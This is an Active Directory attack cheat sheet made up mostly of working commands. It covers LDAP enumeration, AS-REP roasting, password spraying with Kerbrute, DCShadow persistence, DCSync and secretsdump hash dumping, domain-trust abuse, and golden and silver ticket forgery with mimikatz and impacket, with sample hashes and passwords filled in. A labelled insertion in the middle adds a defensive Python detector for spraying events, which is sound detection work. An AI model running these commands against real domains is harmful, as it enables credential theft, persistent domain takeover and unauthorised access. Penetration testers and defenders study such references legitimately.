Enumeration
Basic ldap enumeration
python3 /opt/enum4linux-ng/enum4linux-ng.py -A 1.3.3.7 -p Password123 -u morph3
python windapsearch.py -u morph3 -p morph3 -d evil.corp --dc-ip 192.168.1.2
python ad-ldap-enum.py -d contoso.com -l 10.0.0.1 -u Administrator -p P@ssw0rd
LDAP Queries
Get all the users
Get-ADUser -LDAPFilter "(objectClass=user)"
Dump ldap fully
export LDAPTLS_REQCERT=never
ldapsearch -LLL -x -H ldaps://dc.foobar.local -b 'dc=foobar,dc=local' -s sub '(objectclass=*)' -D 'test@foobar.local' -w foobar
AS-Rep Roasting
If a user has pre-auth enabled, you can grab his/her hash.
impacket-GetNPUsers ecorp.local/ -format hashcat -usersfile ./users -dc-ip 10.3.3.7
Bruteforcing - Password Spraying
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
Kerbrute
Kerberos (port 88) bruteforcing
# Password brute
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 192.168.1.2 rockyou.txt morph3
# Username brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 192.168.1.2 users.txt
# Password spray
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 192.168.1.2 users.txt rockyou.txt
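From the defender's side, the Kerberos events a domain controller logs during the password spraying and Kerbrute runs above (4771 pre-auth failures for a spray, 4768 requests for unknown principals for userenum) are what detection keys on. The following is an added example, not part of the original cheat sheet: a small detector over constructed, simplified key=value log lines (field names mirror the Windows event fields; the line format itself is assumed) that flags a source IP hitting many distinct accounts in a short window.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: a simplified key=value export of DC Security log events
# (4771 = Kerberos pre-auth failed, 4768 = TGT requested). Not real log data.
SAMPLE_LOG = """\
2024-03-01T09:00:01 EventID=4771 TargetUserName=alice IpAddress=192.168.1.50 Status=0x18
2024-03-01T09:00:02 EventID=4771 TargetUserName=bob IpAddress=192.168.1.50 Status=0x18
2024-03-01T09:00:02 EventID=4771 TargetUserName=carol IpAddress=192.168.1.50 Status=0x18
2024-03-01T09:00:03 EventID=4771 TargetUserName=dave IpAddress=192.168.1.50 Status=0x18
2024-03-01T09:00:11 EventID=4771 TargetUserName=alice IpAddress=192.168.1.20 Status=0x18
2024-03-01T09:01:00 EventID=4768 TargetUserName=zed01 IpAddress=10.9.8.7 Status=0x6
2024-03-01T09:01:00 EventID=4768 TargetUserName=zed02 IpAddress=10.9.8.7 Status=0x6
2024-03-01T09:01:01 EventID=4768 TargetUserName=zed03 IpAddress=10.9.8.7 Status=0x6
2024-03-01T09:01:01 EventID=4768 TargetUserName=alice IpAddress=10.9.8.7 Status=0x0
"""

# (EventID, Status) pairs that characterise the two Kerbrute modes above.
SIGNATURES = {
    "password_spray": ("4771", "0x18"),  # KDC_ERR_PREAUTH_FAILED: wrong password
    "user_enum": ("4768", "0x6"),        # KDC_ERR_C_PRINCIPAL_UNKNOWN: no such account
}

def parse_line(line):
    """Turn one 'timestamp key=value ...' line into a dict; 'ts' is a datetime."""
    ts, *fields = line.split()
    rec = dict(f.split("=", 1) for f in fields)
    rec["ts"] = datetime.fromisoformat(ts)
    return rec

def detect(log_text, window=timedelta(minutes=5), threshold=3):
    """Map (kind, source_ip) -> peak distinct target accounts seen inside `window`,
    for every source that reaches `threshold` with one signature."""
    by_key = defaultdict(list)
    for line in filter(str.strip, log_text.splitlines()):
        e = parse_line(line)
        for kind, sig in SIGNATURES.items():
            if (e["EventID"], e["Status"]) == sig:
                by_key[(kind, e["IpAddress"])].append(e)
    alerts = {}
    for key, evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        peak = 0
        for i, start in enumerate(evs):  # window anchored at each event in turn
            users = {e["TargetUserName"] for e in evs[i:] if e["ts"] - start["ts"] <= window}
            peak = max(peak, len(users))
        if peak >= threshold:
            alerts[key] = peak
    return alerts
```

A single wrong password from 192.168.1.20 stays below the threshold, while the spraying host and the enumerating host are each reported once with the number of accounts they touched.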
DC Shadow
-This is a persistence attack-
The DC Shadow attack aims to inject a malicious Domain Controller into the AD infrastructure so that we can dump actual AD members.
Find sid for that user
wmic useraccount where (name='administrator' and domain='%userdomain%') get name,sid
This will create an RPC server and listen
lsadump::dcshadow /object:"CN=morph3,OU=Business,OU=Users,OU=ECORP,DC=ECORP,DC=local" /attribute:sidhistory /value:sid
Run this from another mimikatz instance
lsadump::dcshadow /push
After this, unregistration must be done. Log in again and perform a DCSync:
lsadump::dcsync /domain:ECORP.local /account:krbtgt
DC Sync
Using mimikatz,
lsadump::dcsync /domain:domain /all /csv
lsadump::dcsync /user:krbtgt
Using DCSync.ps1,
https://gist.github.com/monoxgas/9d238accd969550136db
powershell.exe -c "Import-Module .\Invoke-DCSync.ps1; Invoke-DCSync -PWDumpFormat"
Using the secretsdump module from impacket,
python secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
python secretsdump.py -system /tmp/SYSTEM -ntds /tmp/ntds.dit LOCAL
impacket-secretsdump morph3@10.11.1.75
Domain Trust
get-domaintrustmapping
We get the current domain or target domain SID using Get-DomainSID
kerberos::golden /user:Administrator /domain:<curr_domain> /sid:<curr_domain_sid> /krbtgt:<curr_domain_krbtgt_hash> /sids:<target_domain_sid> /ptt
Golden Ticket
Use krbtgt's hash and you can forge tickets for anyone.
Get krbtgt hash,
lsadump::dcsync /all /csv
You might want to patch it
lsadump::lsa /patch
lsadump::trust /patch
Forging the ticket
/rc4 or /krbtgt -> krbtgt hash
/ticket -> this parameter is optional but default is ticket.kirbi
/groups -> this parameter is optional but default is 513,512,520,518,519
/ptt -> switch to perform ptt
kerberos::golden /user:morph3 /domain:evil.corp /sid:domains-sid /krbtgt:krbtgt-hash /ticket:ticket.kirbi /groups:501,502,513,512,520,518,519
kerberos::ptt ticket.kirbi
After this, your final ticket should be ready and in your cache. You can now verify it is working with the following commands:
dir \\DC\C$
psexec.exe \\DC cmd.exe
Purge it afterwards.
If you want to use Metasploit:
post/windows/escalate/golden_ticket
Silver Ticket
Service accounts
ticketer,
python3 /opt/impacket/examples/ticketer.py -domain scrm.local -user sqlsvc -password Pegasus60 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 ksimpson -spn MSSQLSvc/dc1.scrm.local -nthash B999A16500B87D17EC7F2E2A68778F05